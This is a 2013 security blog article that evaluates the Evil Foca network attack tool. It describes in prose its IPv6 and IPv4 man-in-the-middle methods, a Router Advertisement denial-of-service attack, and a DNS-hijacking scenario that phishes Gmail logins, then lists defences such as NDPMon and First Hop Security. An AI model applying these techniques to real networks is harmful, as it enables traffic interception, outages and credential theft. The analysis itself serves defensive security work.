New release : CTI Report - Pharmaceutical and drug manufacturing 

                 Download now

Evil Foca: An attack tool targeting IPv4 and IPv6 networks

May 6, 2013

Evil Foca: An attack tool targeting IPv4 and IPv6 networks

As part of Intrinsec's research activities on IPv6 security, we tested the features of Evil Foca. This article examines the implemented attacks and their relevance. Evil Foca is a tool designed by Informatica64 to test the security level of IPv4 and IPv6 networks. The Alpha version released on April 6, 2013, implements three types of attacks: Man in the middle, a denial-of-service type attack and a DNS hijacking attack.

Network scan:

When the tool is launched, the user chooses the network interface that will be used to send the packets. By default, it uses ICMPv6 Ping (type 128), with the multicast addresses ff01::1, ff02::1, ff01::2 and ff02::2 as destinations, as illustrated in the network screenshot below.

At this stage, the tool retrieves all responses from existing machines on the network, then sends an ICMPv6 "Neighbor Solicitation" message to collect the MAC addresses of those machines. Once the "Neighbor Advertisement" messages are received, Evil Foca sends an ICMPv6 "Parameter problem" message—type 4, with the "code" field set to 0, indicating the error "unrecognized Next Header type encountered"—to all machines that responded to the "Echo Request" message sent during the scan. As the purpose of this packet is unclear, we contacted the tool's developers regarding its function. Having received no response so far, this point will be updated later. For more information on the Parameter problem message, refer to RFC 2463 section 3.4. Finally, the machine discovery process is repeated every 60 seconds.

Evil Foca uses a scan that employs Router Advertisement packets sent to the multicast address ff02::1, which all machines on the network must listen to in order to receive information sent by routers. A closer look at the packet sent by Evil Foca reveals that it instructs the client not to request any configuration from the DHCPv6 server while simultaneously positioning the attacker's machine as the router with the highest preference value, as shown in the following screenshot.

The user can choose the type of scan they wish to perform by changing the option in the configuration (setting) menu.

Man in the middle:

Evil Foca implements the Man in the middle attack for both IPv6 and IPv4 network stacks, using several exploitation methods.

For IPv6 networks:

To perform a Man-in-the-Middle attack on IPv6 networks, Evil Foca proposes three methods. The first is to use "Neighbor Advertisement Spoofing," which involves sending malicious "Neighbor Advertisement" messages to modify the "Neighbor Cache" of target machines. The second method uses "Router Advertisement" messages to position the attacker as a router, causing traffic from all targets to be redirected to the attacker. The final method employs a malicious DHCPv6 server that broadcasts false addressing information.

Scenario :

Consider the following network diagram:

Suppose an attacker manages to connect to the network and launches the tool. Upon launch, Evil Foca will perform a network scan and display the results. Before the attack is launched, the target machine's "Neighbor cache" contains only one record: that of the router.

To launch the attack, simply add the targets and then click the Start button. Depending on the method used, the tool will begin sending malicious packets to corrupt the target's cache.

After the attack was launched, the target machine's cache was indeed modified, containing the IPv6 addresses of both the legitimate router and the attacker's router. However, the router's addresses were assigned the same MAC address (that of the attacker's machine), as illustrated below.

At this stage, we are supposed to receive packets to and from the target machine. However, during the machine search phase, Evil Foca only found the "Link-local" addresses we used to corrupt the caches of the target machine and the router. Since machines in an IPv6 network can have multiple addresses, including global addresses, we can only intercept communications using "Link-local" addresses. This can be seen as a major drawback of the tool. To overcome this problem, we can perform a scan using other tools like Nmap (version 6.0 or higher), which perfectly handles the collection of global addresses, and then add these addresses to the target list.

For IPv4 networks:

The Man-in-the-Middle attack implemented by Evil Foca for IPv4 networks uses two exploitation methods. The tool proposes ARP spoofing as the first attack method or performing a "DHCP ACK injection" as illustrated below.

This attack relies on sending erroneous data to the machine requesting addressing information, using "DHCP ACK" packets and information broadcast by the client machine when it searches for a DHCP server.

Denial-of-service attacks:

The denial-of-service attack against hosts with the IPv6 stack enabled is aimed at Windows machines. This attack exploits a vulnerability in the implementation of NDP "Neighbor Discovery Protocol" (CVE-2012-4669During this attack, Evil Foca sends multiple Router Advertisement (RA) packets with different source addresses, leading to the consumption of all CPU resources and rendering the equipment unavailable. Regarding the denial-of-service attack against IPv4 machines, the tool severs the connection between two machines by modifying the target's ARP cache with a malicious ARP packet.

DNS Hijacking:

Evil Foca allows us to implement a "DNS Hijacking" attack. The principle of this attack is to redirect DNS queries to a malicious DNS server. To carry out this attack, a Man-in-the-Middle attack must be performed beforehand.

Scenario :

We will use the same network diagram as before. To carry out a phishing campaign, an attacker needs to set up a web server that simulates an authentication page for a well-known website offering an email service, such as Gmail. Then, to redirect users to the malicious site, we will use a DNS hijacking attack. This is to link the domain name www.gmail.com addressed to the attacker as shown below.

After the attack is launched, when a network user tries to access the domain name www.gmail.com, the IP address sent to the client will be that of the attacker hosting the malicious server.

Finally, the web page will be loaded from the malicious web server, and thus the attacker will be able to retrieve the login information entered by the user.

Conclusion

Evil Foca is still under development, which explains its weakness in node detection. The tool does not identify the global addresses of IPv6 machines, thus limiting the effectiveness of the "Man-in-the-Middle" attack, as outgoing and incoming network traffic is not intercepted. Evil Foca does contain some interesting attacks, particularly the "Man-in-the-Middle" attack in an IPv6 network, which is not available in any user-friendly tool. This makes these attacks more accessible and increases the risk of their execution.

There are solutions that operate at layer 2 to protect against this type of attack. These include open-source solutions like Rafixd and NDPMon, which detect malicious packets traveling across the network, and FHS (First Hop Security), offered by Cisco, which provides a comprehensive solution for protection against this type of attack.

The final version of Evil Foca will implement an attack using IPv6 to intercept traffic in an IPv4 network, which will pose a real threat to networks with both IPv6 and IPv4 stacks enabled (for more information on the NAT64/DNS64 attack, refer to the blog (from informatica64). To protect against this attack, the IPv6 network stack must be disabled if it is not in use.

Contact